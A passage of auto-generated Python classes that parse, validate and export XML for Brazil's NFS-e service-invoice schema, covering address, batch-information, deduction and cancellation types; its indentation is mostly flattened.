validate_tpCidade_patterns_ = [['^[0-9]$']]
def validate_tpUF(self, value):
# Validate type tpUF, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 2:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpUF' % {"value" : value.encode("utf-8")} )
if len(value) < 2:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpUF' % {"value" : value.encode("utf-8")} )
def validate_tpCEP(self, value):
# Validate type tpCEP, a restriction on xs:int.
if value is not None and Validate_simpletypes_:
            if not self.gds_validate_simple_patterns(
                    self.validate_tpCEP_patterns_, str(value)):  # patterns need a string; value is parsed as an integer
                warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value, self.validate_tpCEP_patterns_, ))
validate_tpCEP_patterns_ = [['^[0-9]{0,8}$']]
def hasContent_(self):
if (
self.TipoLogradouro is not None or
self.Logradouro is not None or
self.NumeroEndereco is not None or
self.ComplementoEndereco is not None or
self.TipoBairro is not None or
self.Bairro is not None or
self.Cidade is not None or
self.UF is not None or
self.CEP is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpEndereco', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpEndereco')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpEndereco')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpEndereco', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpEndereco'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpEndereco', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.TipoLogradouro is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TipoLogradouro>%s</ns1:TipoLogradouro>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TipoLogradouro), input_name='TipoLogradouro')), eol_))
if self.Logradouro is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:Logradouro>%s</ns1:Logradouro>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.Logradouro), input_name='Logradouro')), eol_))
if self.NumeroEndereco is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroEndereco>%s</ns1:NumeroEndereco>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.NumeroEndereco), input_name='NumeroEndereco')), eol_))
if self.ComplementoEndereco is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ComplementoEndereco>%s</ns1:ComplementoEndereco>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.ComplementoEndereco), input_name='ComplementoEndereco')), eol_))
if self.TipoBairro is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TipoBairro>%s</ns1:TipoBairro>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TipoBairro), input_name='TipoBairro')), eol_))
if self.Bairro is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:Bairro>%s</ns1:Bairro>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.Bairro), input_name='Bairro')), eol_))
if self.Cidade is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:Cidade>%s</ns1:Cidade>%s' % (self.gds_format_integer(self.Cidade, input_name='Cidade'), eol_))
if self.UF is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:UF>%s</ns1:UF>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.UF), input_name='UF')), eol_))
if self.CEP is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CEP>%s</ns1:CEP>%s' % (self.gds_format_integer(self.CEP, input_name='CEP'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'TipoLogradouro':
TipoLogradouro_ = child_.text
TipoLogradouro_ = self.gds_validate_string(TipoLogradouro_, node, 'TipoLogradouro')
self.TipoLogradouro = TipoLogradouro_
# validate type tpTipoLogradouro
self.validate_tpTipoLogradouro(self.TipoLogradouro)
elif nodeName_ == 'Logradouro':
Logradouro_ = child_.text
Logradouro_ = self.gds_validate_string(Logradouro_, node, 'Logradouro')
self.Logradouro = Logradouro_
# validate type tpLogradouro
self.validate_tpLogradouro(self.Logradouro)
elif nodeName_ == 'NumeroEndereco':
NumeroEndereco_ = child_.text
NumeroEndereco_ = self.gds_validate_string(NumeroEndereco_, node, 'NumeroEndereco')
self.NumeroEndereco = NumeroEndereco_
# validate type tpNumeroEndereco
self.validate_tpNumeroEndereco(self.NumeroEndereco)
elif nodeName_ == 'ComplementoEndereco':
ComplementoEndereco_ = child_.text
ComplementoEndereco_ = self.gds_validate_string(ComplementoEndereco_, node, 'ComplementoEndereco')
self.ComplementoEndereco = ComplementoEndereco_
# validate type tpComplementoEndereco
self.validate_tpComplementoEndereco(self.ComplementoEndereco)
elif nodeName_ == 'TipoBairro':
TipoBairro_ = child_.text
TipoBairro_ = self.gds_validate_string(TipoBairro_, node, 'TipoBairro')
self.TipoBairro = TipoBairro_
# validate type tpTipoBairro
self.validate_tpTipoBairro(self.TipoBairro)
elif nodeName_ == 'Bairro':
Bairro_ = child_.text
Bairro_ = self.gds_validate_string(Bairro_, node, 'Bairro')
self.Bairro = Bairro_
# validate type tpBairro
self.validate_tpBairro(self.Bairro)
elif nodeName_ == 'Cidade':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'Cidade')
self.Cidade = ival_
# validate type tpCidade
self.validate_tpCidade(self.Cidade)
elif nodeName_ == 'UF':
UF_ = child_.text
UF_ = self.gds_validate_string(UF_, node, 'UF')
self.UF = UF_
# validate type tpUF
self.validate_tpUF(self.UF)
elif nodeName_ == 'CEP':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'CEP')
self.CEP = ival_
# validate type tpCEP
self.validate_tpCEP(self.CEP)
# end class tpEndereco
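# Usage sketch (fictitious address): every child element of tpEndereco is
# optional, and fields left as None are simply omitted from the XML output.
#
#     import sys
#     endereco = tpEndereco(
#         TipoLogradouro='Rua',
#         Logradouro='das Flores',
#         NumeroEndereco='100',
#         Bairro='Centro',
#         UF='SP',
#         CEP=1001000,
#     )
#     endereco.export(sys.stdout, level=0)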
class tpInformacoesLote(GeneratedsSuper):
"""Informações do lote processado."""
subclass = None
superclass = None
def __init__(self, NumeroLote=None, InscricaoPrestador=None, CPFCNPJRemetente=None, DataEnvioLote=None, QtdNotasProcessadas=None, TempoProcessamento=None, ValorTotalServicos=None, ValorTotalDeducoes=None):
self.original_tagname_ = None
self.NumeroLote = NumeroLote
self.validate_tpNumero(self.NumeroLote)
self.InscricaoPrestador = InscricaoPrestador
self.validate_tpInscricaoMunicipal(self.InscricaoPrestador)
self.CPFCNPJRemetente = CPFCNPJRemetente
self.validate_tpCPFCNPJ(self.CPFCNPJRemetente)
if isinstance(DataEnvioLote, BaseStrType_):
initvalue_ = datetime_.datetime.strptime(DataEnvioLote, '%Y-%m-%dT%H:%M:%S')
else:
initvalue_ = DataEnvioLote
self.DataEnvioLote = initvalue_
self.QtdNotasProcessadas = QtdNotasProcessadas
self.validate_tpQuantidade(self.QtdNotasProcessadas)
self.TempoProcessamento = TempoProcessamento
self.validate_tpTempoProcessamento(self.TempoProcessamento)
self.ValorTotalServicos = ValorTotalServicos
self.validate_tpValor(self.ValorTotalServicos)
self.ValorTotalDeducoes = ValorTotalDeducoes
self.validate_tpValor(self.ValorTotalDeducoes)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpInformacoesLote)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpInformacoesLote.subclass:
return tpInformacoesLote.subclass(*args_, **kwargs_)
else:
return tpInformacoesLote(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpNumero(self, value):
# Validate type tpNumero, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpNumero' % {"value" : value} )
if value > 2147483647:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpNumero' % {"value" : value} )
            if not self.gds_validate_simple_patterns(
                    self.validate_tpNumero_patterns_, str(value)):  # patterns need a string; value is parsed as an integer
                warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value, self.validate_tpNumero_patterns_, ))
validate_tpNumero_patterns_ = [['^[0-9]{1,12}$']]
def validate_tpInscricaoMunicipal(self, value):
# Validate type tpInscricaoMunicipal, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
            if not self.gds_validate_simple_patterns(
                    self.validate_tpInscricaoMunicipal_patterns_, str(value)):  # patterns need a string; value is parsed as an integer
                warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value, self.validate_tpInscricaoMunicipal_patterns_, ))
validate_tpInscricaoMunicipal_patterns_ = [['^[0-9]{6,11}$']]
def validate_tpCPFCNPJ(self, value):
# Validate type tpCPFCNPJ, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpCPFCNPJ_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpCPFCNPJ_patterns_, ))
validate_tpCPFCNPJ_patterns_ = [['^[0-9]{11}$|^[0-9]{14}$']]
def validate_tpQuantidade(self, value):
# Validate type tpQuantidade, a restriction on xs:decimal.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpQuantidade' % {"value" : value} )
if len(str(value)) >= 10:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpQuantidade' % {"value" : value} )
def validate_tpTempoProcessamento(self, value):
# Validate type tpTempoProcessamento, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
            if not self.gds_validate_simple_patterns(
                    self.validate_tpTempoProcessamento_patterns_, str(value)):  # patterns need a string; value is parsed as an integer
                warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value, self.validate_tpTempoProcessamento_patterns_, ))
validate_tpTempoProcessamento_patterns_ = [['^[0-9]{1,15}$']]
def validate_tpValor(self, value):
# Validate type tpValor, a restriction on xs:decimal.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpValor' % {"value" : value} )
if len(str(value)) >= 15:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpValor' % {"value" : value} )
            if not self.gds_validate_simple_patterns(
                    self.validate_tpValor_patterns_, str(value)):  # patterns need a string; value may arrive as a float
                warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value, self.validate_tpValor_patterns_, ))
validate_tpValor_patterns_ = [['^0$|^0\\.[0-9]{2}$|^[1-9]{1}[0-9]{0,12}(\\.[0-9]{0,2})?$']]
def hasContent_(self):
if (
self.NumeroLote is not None or
self.InscricaoPrestador is not None or
self.CPFCNPJRemetente is not None or
self.DataEnvioLote is not None or
self.QtdNotasProcessadas is not None or
self.TempoProcessamento is not None or
self.ValorTotalServicos is not None or
self.ValorTotalDeducoes is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpInformacoesLote', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpInformacoesLote')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpInformacoesLote')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpInformacoesLote', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpInformacoesLote'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpInformacoesLote', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.NumeroLote is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroLote>%s</ns1:NumeroLote>%s' % (self.gds_format_integer(self.NumeroLote, input_name='NumeroLote'), eol_))
if self.InscricaoPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:InscricaoPrestador>%s</ns1:InscricaoPrestador>%s' % (self.gds_format_integer(self.InscricaoPrestador, input_name='InscricaoPrestador'), eol_))
if self.CPFCNPJRemetente is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CPFCNPJRemetente>%s</ns1:CPFCNPJRemetente>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CPFCNPJRemetente), input_name='CPFCNPJRemetente')), eol_))
if self.DataEnvioLote is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DataEnvioLote>%s</ns1:DataEnvioLote>%s' % (self.gds_format_datetime(self.DataEnvioLote, input_name='DataEnvioLote'), eol_))
if self.QtdNotasProcessadas is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:QtdNotasProcessadas>%s</ns1:QtdNotasProcessadas>%s' % (self.gds_format_float(self.QtdNotasProcessadas, input_name='QtdNotasProcessadas'), eol_))
if self.TempoProcessamento is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TempoProcessamento>%s</ns1:TempoProcessamento>%s' % (self.gds_format_integer(self.TempoProcessamento, input_name='TempoProcessamento'), eol_))
if self.ValorTotalServicos is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorTotalServicos>%s</ns1:ValorTotalServicos>%s' % (self.gds_format_float(self.ValorTotalServicos, input_name='ValorTotalServicos'), eol_))
if self.ValorTotalDeducoes is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorTotalDeducoes>%s</ns1:ValorTotalDeducoes>%s' % (self.gds_format_float(self.ValorTotalDeducoes, input_name='ValorTotalDeducoes'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'NumeroLote':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroLote')
self.NumeroLote = ival_
# validate type tpNumero
self.validate_tpNumero(self.NumeroLote)
elif nodeName_ == 'InscricaoPrestador':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'InscricaoPrestador')
self.InscricaoPrestador = ival_
# validate type tpInscricaoMunicipal
self.validate_tpInscricaoMunicipal(self.InscricaoPrestador)
elif nodeName_ == 'CPFCNPJRemetente':
CPFCNPJRemetente_ = child_.text
CPFCNPJRemetente_ = self.gds_validate_string(CPFCNPJRemetente_, node, 'CPFCNPJRemetente')
self.CPFCNPJRemetente = CPFCNPJRemetente_
# validate type tpCPFCNPJ
self.validate_tpCPFCNPJ(self.CPFCNPJRemetente)
elif nodeName_ == 'DataEnvioLote':
sval_ = child_.text
dval_ = self.gds_parse_datetime(sval_)
self.DataEnvioLote = dval_
elif nodeName_ == 'QtdNotasProcessadas':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'QtdNotasProcessadas')
self.QtdNotasProcessadas = fval_
# validate type tpQuantidade
self.validate_tpQuantidade(self.QtdNotasProcessadas)
elif nodeName_ == 'TempoProcessamento':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'TempoProcessamento')
self.TempoProcessamento = ival_
# validate type tpTempoProcessamento
self.validate_tpTempoProcessamento(self.TempoProcessamento)
elif nodeName_ == 'ValorTotalServicos':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorTotalServicos')
self.ValorTotalServicos = fval_
# validate type tpValor
self.validate_tpValor(self.ValorTotalServicos)
elif nodeName_ == 'ValorTotalDeducoes':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorTotalDeducoes')
self.ValorTotalDeducoes = fval_
# validate type tpValor
self.validate_tpValor(self.ValorTotalDeducoes)
# end class tpInformacoesLote
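# Parsing sketch (assumes xml_bytes holds an InformacoesLote element as
# returned by the web service): build() fills an empty instance from an
# lxml node and runs the same validators as the constructor.
#
#     from lxml import etree
#     node = etree.fromstring(xml_bytes)
#     info = tpInformacoesLote().build(node)
#     print(info.NumeroLote, info.DataEnvioLote)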
class tpLogradouroCompleto(GeneratedsSuper):
"""Informações do Logradouro com o seu Tipo."""
subclass = None
superclass = None
def __init__(self, TipoLogradouro=None, NomeLogradouro=None):
self.original_tagname_ = None
self.TipoLogradouro = TipoLogradouro
self.validate_tpTipoLogradouro(self.TipoLogradouro)
self.NomeLogradouro = NomeLogradouro
self.validate_tpLogradouro(self.NomeLogradouro)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpLogradouroCompleto)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpLogradouroCompleto.subclass:
return tpLogradouroCompleto.subclass(*args_, **kwargs_)
else:
return tpLogradouroCompleto(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpTipoLogradouro(self, value):
# Validate type tpTipoLogradouro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 10:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpTipoLogradouro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpTipoLogradouro' % {"value" : value.encode("utf-8")} )
def validate_tpLogradouro(self, value):
# Validate type tpLogradouro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 50:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpLogradouro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpLogradouro' % {"value" : value.encode("utf-8")} )
def hasContent_(self):
if (
self.TipoLogradouro is not None or
self.NomeLogradouro is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpLogradouroCompleto', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpLogradouroCompleto')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpLogradouroCompleto')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpLogradouroCompleto', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpLogradouroCompleto'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpLogradouroCompleto', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.TipoLogradouro is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TipoLogradouro>%s</ns1:TipoLogradouro>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TipoLogradouro), input_name='TipoLogradouro')), eol_))
if self.NomeLogradouro is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NomeLogradouro>%s</ns1:NomeLogradouro>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.NomeLogradouro), input_name='NomeLogradouro')), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'TipoLogradouro':
TipoLogradouro_ = child_.text
TipoLogradouro_ = self.gds_validate_string(TipoLogradouro_, node, 'TipoLogradouro')
self.TipoLogradouro = TipoLogradouro_
# validate type tpTipoLogradouro
self.validate_tpTipoLogradouro(self.TipoLogradouro)
elif nodeName_ == 'NomeLogradouro':
NomeLogradouro_ = child_.text
NomeLogradouro_ = self.gds_validate_string(NomeLogradouro_, node, 'NomeLogradouro')
self.NomeLogradouro = NomeLogradouro_
# validate type tpLogradouro
self.validate_tpLogradouro(self.NomeLogradouro)
# end class tpLogradouroCompleto
class tpListaAlertas(GeneratedsSuper):
"""Alertas."""
subclass = None
superclass = None
def __init__(self, Alerta=None):
self.original_tagname_ = None
if Alerta is None:
self.Alerta = []
else:
self.Alerta = Alerta
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpListaAlertas)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpListaAlertas.subclass:
return tpListaAlertas.subclass(*args_, **kwargs_)
else:
return tpListaAlertas(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.Alerta
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpListaAlertas', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpListaAlertas')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpListaAlertas')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpListaAlertas', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpListaAlertas'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpListaAlertas', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Alerta_ in self.Alerta:
Alerta_.export(outfile, level, namespace_, name_='Alerta', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Alerta':
obj_ = tpEvento.factory()
obj_.build(child_)
self.Alerta.append(obj_)
obj_.original_tagname_ = 'Alerta'
# end class tpListaAlertas
class tpListaDeducoes(GeneratedsSuper):
"""Deduções."""
subclass = None
superclass = None
def __init__(self, Deducao=None):
self.original_tagname_ = None
if Deducao is None:
self.Deducao = []
else:
self.Deducao = Deducao
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpListaDeducoes)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpListaDeducoes.subclass:
return tpListaDeducoes.subclass(*args_, **kwargs_)
else:
return tpListaDeducoes(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.Deducao
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpListaDeducoes', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpListaDeducoes')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpListaDeducoes')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpListaDeducoes', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpListaDeducoes'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpListaDeducoes', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Deducao_ in self.Deducao:
Deducao_.export(outfile, level, namespace_, name_='Deducao', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Deducao':
obj_ = tpDeducoes.factory()
obj_.build(child_)
self.Deducao.append(obj_)
obj_.original_tagname_ = 'Deducao'
# end class tpListaDeducoes
class tpLoteCancelamentoNFSe(GeneratedsSuper):
"""Lista de Detalhes do Cancelamento de NFSe."""
subclass = None
superclass = None
def __init__(self, Id=None, Nota=None):
self.original_tagname_ = None
self.Id = _cast(None, Id)
if Nota is None:
self.Nota = []
else:
self.Nota = Nota
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpLoteCancelamentoNFSe)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpLoteCancelamentoNFSe.subclass:
return tpLoteCancelamentoNFSe.subclass(*args_, **kwargs_)
else:
return tpLoteCancelamentoNFSe(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.Nota
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpLoteCancelamentoNFSe', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpLoteCancelamentoNFSe')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpLoteCancelamentoNFSe')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpLoteCancelamentoNFSe', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpLoteCancelamentoNFSe'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.Id), input_name='Id')), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpLoteCancelamentoNFSe', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Nota_ in self.Nota:
Nota_.export(outfile, level, namespace_, name_='Nota', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
